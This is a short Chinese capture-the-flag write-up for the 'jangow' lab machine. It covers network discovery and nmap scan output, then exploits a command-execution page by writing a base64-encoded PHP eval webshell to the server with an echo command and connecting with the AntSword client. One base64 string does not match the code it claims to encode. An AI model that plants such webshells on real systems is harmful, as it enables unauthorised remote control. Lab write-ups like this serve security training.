當前位置:網站首頁>jangow靶機滲透

jangow靶機滲透

2022-01-28 14:08:11 qq_42307546

今天給大家帶來一個簡單難度的靶機
首先主機掃描
netdiscover -i eth0 192.168.1.1/24
掃出靶機地址為
192.168.1.13
nmap 掃描
nmap -sV -p 0-6550 192.168.1.13

Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST
Nmap scan report for 192.168.1.13
Host is up (0.00071s latency).
Not shown: 6549 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
MAC Address: 00:0C:29:59:F7:8E (VMware)
Service Info: Host: 127.0.0.1; OS: Unix

直接訪問80端口,發現busque頁面存在rce
在這裏插入圖片描述

直接通過echo命令base64編碼下寫入一句話
將這段代碼進行base64編碼

<?php @eval($_POST['cmd']); ?>

PD9AZXZhbCgkX1BPU1RbJ21vb24nXSk7Pz4g
通過echo 命令寫入
echo “PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Cj8+”|base64 -d >shell9.php

蟻劍連接,獲取flag
在這裏插入圖片描述

版權聲明
本文為[qq_42307546]所創,轉載請帶上原文鏈接,感謝
https://cht.chowdera.com/2022/01/202201281408114297.html

隨機推薦